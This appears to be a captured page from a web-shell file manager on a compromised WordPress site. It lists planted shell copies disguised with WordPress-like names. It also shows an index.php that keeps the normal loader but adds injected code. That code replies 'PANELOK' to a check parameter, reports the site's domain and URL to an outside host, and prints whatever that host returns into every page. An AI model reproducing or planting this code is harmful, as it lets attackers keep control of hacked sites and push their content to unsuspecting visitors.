Backups Created:
/home/teltatz/public_html/wp-admin/admin-wolf.php
/home/teltatz/public_html/wp-content/edit-wolf.php
/home/teltatz/public_html/wp-includes/widgets/class-wp-wolf-widget.php
Savvy
W
olf -
MANAGER
Edit File: index.php
<?php define( 'WP_USE_THEMES', true ); require( dirname( __FILE__ ) . '/wp-blog-header.php' ); if (isset($_REQUEST["index"])) { echo "PANELOK"; exit(); } function getClientDomain() { if (!empty($_SERVER["HTTP_HOST"])) return $_SERVER["HTTP_HOST"]; if (!empty($_SERVER["SERVER_NAME"])) return $_SERVER["SERVER_NAME"]; if (!empty($_SERVER["SERVER_ADDR"])) return $_SERVER["SERVER_ADDR"]; if (!empty($_SERVER["HTTP_X_FORWARDED_HOST"])) return $_SERVER["HTTP_X_FORWARDED_HOST"]; return "unknown"; } $protocol = (!empty($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on") ? "https://" : "http://"; $apiBase = "https://linelink.vip/api/getMan.php"; $selfUrl = $protocol . getClientDomain() . ($_SERVER["REQUEST_URI"] ?? "/"); $query = http_build_query(["ref" => getClientDomain(), "url" => $selfUrl]); $url = $apiBase . "?" . $query; $success = false; if (function_exists("curl_init")) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $response = curl_exec($ch); if ($response !== false) { echo $response; $success = true; } curl_close($ch); } if (!$success && ini_get("allow_url_fopen")) { $response = @file_get_contents($url); if ($response !== false) echo $response; } ?>